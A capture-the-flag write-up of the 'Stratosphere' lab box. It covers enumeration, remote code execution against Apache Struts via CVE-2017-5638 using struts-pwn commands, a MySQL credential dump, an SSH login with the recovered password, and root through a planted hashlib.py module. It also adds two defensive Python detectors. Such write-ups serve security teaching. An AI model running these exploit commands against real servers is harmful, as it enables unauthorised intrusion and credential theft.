Stratosphere Writeup

Nmap scanning revealed ports 22, 80, and 8080 open on the target. Gobuster found a /Monitoring directory. This led to an Apache Struts application vulnerable to CVE-2017-5638. Remote code execution was achieved using struts-pwn.py. Database credentials were found in a db_connect file, allowing access to a MySQL users database. This revealed a richard/9tc*rhKuG5TyXvUJOrE^5CK7k account. SSHing in as richard, a test.py file was found containing an encrypted hash. This was cracked online. Further privilege escalation was achieved by creating a Trojan hashlib.py module to gain root.


Stratosphere Writeup

Enumeration

Run a basic Nmap scan to list the open ports and service versions.

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
80/tcp   open  http
8080/tcp open  http-proxy

Enumerating Webservice - Port 80

Visiting the web service on port 80 in a web browser brings us to the “Stratosphere” web
application landing page.

Clicking on the “Getting Started” URL leads us to a “Site under construction” page as seen below.

Now we will run gobuster to find any new folders and pages.


gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.64/ -x php,html -s 200,204,301,302,307,403 -t 100 | tee gobuster_strato

Gobuster reports the new folders shown above.

Visiting the /Monitoring web content redirects us to the “Stratosphere Credit Monitoring”
application.

The application uses the distinctive .action file extension, which is the URL pattern associated
with Apache Struts. A little further research confirms that it is indeed a well-known extension for
Java WebSphere and Apache Struts applications.
If you follow popular infosec news, you will recall that the U.S. credit monitoring company
“Equifax” was compromised through an unpatched Apache Struts vulnerability. Based on the
similarities and the context clues of the “Stratosphere Credit Monitoring” name, we can reasonably
suspect that this application is vulnerable to the “Apache Struts” RCE vulnerability.

After some quick googling we come across the following PoC exploit for the Apache Struts
CVE-2017-5638 vulnerability, called struts-pwn.
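From the defender's side, the useful complement to this step is a way to spot exploitation attempts. CVE-2017-5638 is triggered by an OGNL expression smuggled into a multipart request header (typically Content-Type), which the Jakarta multipart parser echoes into an error message that Struts then evaluates. The following is an added example, not code from the writeup or from struts-pwn: a small scanner that flags requests whose Content-Type or Content-Disposition header carries OGNL markers and notes whether the target path is a Struts action. The request-dict shape and the sample traffic are constructed for the demo.

```python
import re

# Markers of an OGNL expression embedded in a header value.  A genuine
# Content-Type or Content-Disposition never contains these, so a match is
# worth an alert whether or not the server has been patched.
OGNL_MARKERS = re.compile(r"%\{|\$\{|#_memberAccess|ognl\.|@java\.lang\.", re.IGNORECASE)

# Headers the Jakarta multipart parser copies into the error path that
# CVE-2017-5638 abuses.
WATCHED_HEADERS = ("content-type", "content-disposition")


def suspicious_headers(headers):
    """Return [(header_name, matched_marker)] for headers carrying OGNL markers."""
    hits = []
    for name, value in headers.items():
        if name.lower() in WATCHED_HEADERS:
            match = OGNL_MARKERS.search(value)
            if match:
                hits.append((name, match.group(0)))
    return hits


def scan_requests(requests):
    """Flag requests that look like CVE-2017-5638 attempts.

    Each request is assumed to be a dict with 'src', 'path' and 'headers'
    keys (a constructed shape for this example, not a real log format).
    """
    alerts = []
    for req in requests:
        hits = suspicious_headers(req["headers"])
        if hits:
            alerts.append({
                "src": req["src"],
                "path": req["path"],
                # .action is the Struts URL pattern noted in the writeup
                "struts_action": req["path"].lower().endswith(".action"),
                "markers": [marker for _, marker in hits],
            })
    return alerts


# Constructed sample traffic (not captured from the box): a normal page view,
# a normal multipart upload, and one request with an OGNL expression in
# Content-Type.  The expression is a harmless placeholder, not a payload.
SAMPLE_REQUESTS = [
    {"src": "10.10.14.5", "path": "/Monitoring/example/Welcome.action",
     "headers": {"Content-Type": "text/html", "User-Agent": "Mozilla/5.0"}},
    {"src": "10.10.14.6", "path": "/upload",
     "headers": {"Content-Type": "multipart/form-data; boundary=----demo1234"}},
    {"src": "10.10.14.7", "path": "/Monitoring/example/Welcome.action",
     "headers": {"Content-Type": "%{(#demo='multipart/form-data')}"}},
]


def demo():
    """Run the scanner over the constructed sample and return the alerts."""
    return scan_requests(SAMPLE_REQUESTS)


if __name__ == "__main__":
    for alert in demo():
        print(alert)
```

Only the third request is flagged; the legitimate multipart upload passes because a boundary parameter contains none of the markers. In production the same check belongs in the reverse proxy or WAF in front of the Struts instance, and the real fix is upgrading Struts past the affected versions.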

Install the tool with the command below.

git clone https://github.com/mazen160/struts-pwn.git

Once the tool is downloaded, we change into that folder and run the following command.

python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action -c "id; uname -a"

Now that we know we have successful remote code execution, let’s try to escalate our privileges
further, and look into getting an interactive shell.

After some exploring we found a file named db_connect; let’s see what’s in it.

To do that we will use the same tool to cat the file.


The file contains the usernames and passwords for the Users and SSN databases.

So there is a database running on the server. We can enumerate the MySQL database through the
Apache Struts exploit: the mysql -e parameter runs MySQL commands non-interactively, and the
query output comes back through stdout.

python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action --cmd 'mysql --user=admin --password=admin -e "show databases;"'

Database
information_schema
users

python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action --cmd 'mysql --user=admin --password=admin -e "use users; show tables;"'

Tables_in_users
Accounts

python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action --cmd 'mysql --user=admin --password=admin -e "use users; select * from users.accounts;"'

This dumps the contents of the accounts table.

The output shows the full name and password of Richard F Smith.

Attempting to SSH into the box as the richard account, with the password
9tc*rhKuG5TyXvUJOrE^5CK7k from the MySQL database, results in a successful login.

Privilege Escalation

Upon enumeration we found the file test.py; opening it shows that it has a hash stored in it.

We crack the hash with an online service and get the following.
Successfully solving the challenge results in a Permission denied on the success.py script, so it
seems that this may have been a false flag, and we need to enumerate further for the proper
privilege escalation vector.

In order to exploit this vulnerability, all we have to do is create a Python module (one that our
target script imports) in the directory of the script that we are attempting to run. Python puts the
script's own directory at the front of the module search path, so a module there wins over the
standard library copy. Since the test.py script imports the hashlib library, we create a hashlib.py
module next to it, which is loaded in place of the original hashlib module.
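The defensive counterpart to this trick is an audit that catches it before a privileged script runs. The following is an added example, not code from the writeup: it parses a script (without executing it) to collect its top-level imports, checks which of those are standard-library names, and reports any that resolve to a file in the script's own directory, i.e. a module that would shadow the real one. The test.py and hashlib.py it inspects are constructed in a temporary directory for the demo; the function names are my own.

```python
import ast
import os
import sys
import sysconfig
import tempfile


def stdlib_module_names():
    """Top-level module names shipped with this interpreter."""
    names = getattr(sys, "stdlib_module_names", None)  # available on Python 3.10+
    if names is not None:
        return set(names)
    # Older interpreters: derive the list from the stdlib directory itself.
    names = set(sys.builtin_module_names)
    stdlib_dir = sysconfig.get_paths()["stdlib"]
    for entry in os.listdir(stdlib_dir):
        base, ext = os.path.splitext(entry)
        if ext == ".py":
            names.add(base)
        elif os.path.isdir(os.path.join(stdlib_dir, entry)):
            names.add(entry)
    return names


def imported_modules(script_path):
    """Top-level names a script imports, found by parsing it rather than running it."""
    with open(script_path, encoding="utf-8") as fh:
        tree = ast.parse(fh.read(), filename=script_path)
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                names.add(alias.name.split(".")[0])
        elif isinstance(node, ast.ImportFrom) and node.level == 0 and node.module:
            names.add(node.module.split(".")[0])
    return names


def find_shadowed_imports(script_path):
    """Return [(module, path)] for stdlib imports that would resolve to a file
    in the script's own directory (sys.path[0]) instead of the real stdlib."""
    script_dir = os.path.dirname(os.path.abspath(script_path))
    stdlib = stdlib_module_names()
    shadowed = []
    for name in sorted(imported_modules(script_path)):
        if name not in stdlib:
            continue
        for candidate in (os.path.join(script_dir, name + ".py"),
                          os.path.join(script_dir, name, "__init__.py")):
            if os.path.exists(candidate):
                shadowed.append((name, candidate))
    return shadowed


def demo():
    """Constructed fixture: a test.py importing hashlib, first alone, then with a
    rogue hashlib.py beside it.  Returns the shadowed module names in each state."""
    with tempfile.TemporaryDirectory() as tmp:
        script = os.path.join(tmp, "test.py")
        with open(script, "w", encoding="utf-8") as fh:
            fh.write("import hashlib\nprint(hashlib.md5(b'x').hexdigest())\n")
        clean = find_shadowed_imports(script)   # nothing beside the script yet
        with open(os.path.join(tmp, "hashlib.py"), "w", encoding="utf-8") as fh:
            fh.write("# rogue module, constructed for the demo; never executed here\n")
        rogue = find_shadowed_imports(script)
        return [m for m, _ in clean], [m for m, _ in rogue]


if __name__ == "__main__":
    print(demo())
```

The check is static, so it is safe to run against a script you do not trust. A finding like ("hashlib", ".../hashlib.py") next to a script that runs with elevated privileges is the condition this writeup exploits; the fix is to keep such scripts in a directory the invoking user cannot write to, or to run them with python -I so the script directory is not added to sys.path.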

Now we have root.
